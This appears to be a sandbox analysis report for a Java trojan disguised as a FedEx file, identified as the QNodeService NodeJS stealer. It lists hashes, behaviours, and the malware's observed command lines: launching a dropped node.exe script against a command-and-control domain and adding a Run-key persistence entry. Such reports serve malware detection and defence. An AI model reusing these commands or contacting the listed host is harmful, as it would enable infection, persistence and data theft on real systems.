Analysis
-
max time kernel
35s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 15:49
Static task
static1
Behavioral task
behavioral1
Sample
FEDEX1090231102994010211000.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
FEDEX1090231102994010211000.jar
Resource
win10v20201028
General
-
Target
FEDEX1090231102994010211000.jar
-
Size
99KB
-
MD5
383a770e96f2d241ba6ec8622c6a15b7
-
SHA1
f1778e6f8c95107fc5f75b74c591feac8e206977
-
SHA256
344e537d309f34ff04b78446d0dd2092b855181d837920a83c74a58f869a971f
-
SHA512
5c82f2e83ee6644dc3e7a5d487aef9379a0ea9104737d7529d8aa96de8eca6a3c83abcb417d977cf920c0199eb5659ba017c1c4cfa23b48060781a4835a7ea39
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 4772 node.exe 240 node.exe 4504 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\88fd6069-9f79-4651-8a49-f2f6ade29902 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab85-171.dat js behavioral2/files/0x000100000001ab85-174.dat js behavioral2/files/0x000100000001ab85-178.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 wtfismyip.com 23 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4772 node.exe 4772 node.exe 4772 node.exe 4772 node.exe 240 node.exe 240 node.exe 240 node.exe 240 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe 4504 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4796 wrote to memory of 652 4796 java.exe 76 PID 4796 wrote to memory of 652 4796 java.exe 76 PID 652 wrote to memory of 4772 652 javaw.exe 80 PID 652 wrote to memory of 4772 652 javaw.exe 80 PID 4772 wrote to memory of 240 4772 node.exe 82 PID 4772 wrote to memory of 240 4772 node.exe 82 PID 240 wrote to memory of 4504 240 node.exe 83 PID 240 wrote to memory of 4504 240 node.exe 83 PID 4504 wrote to memory of 1376 4504 node.exe 85 PID 4504 wrote to memory of 1376 4504 node.exe 85 PID 1376 wrote to memory of 2684 1376 cmd.exe 86 PID 1376 wrote to memory of 2684 1376 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\FEDEX1090231102994010211000.jar1⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\4851cf0e.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain bawbaw.myftp.biz3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JcIwYq\boot.js --hub-domain bawbaw.myftp.biz4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_JcIwYq\boot.js --hub-domain bawbaw.myftp.biz5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "88fd6069-9f79-4651-8a49-f2f6ade29902" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "88fd6069-9f79-4651-8a49-f2f6ade29902" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2684
-
-
-
-
-
-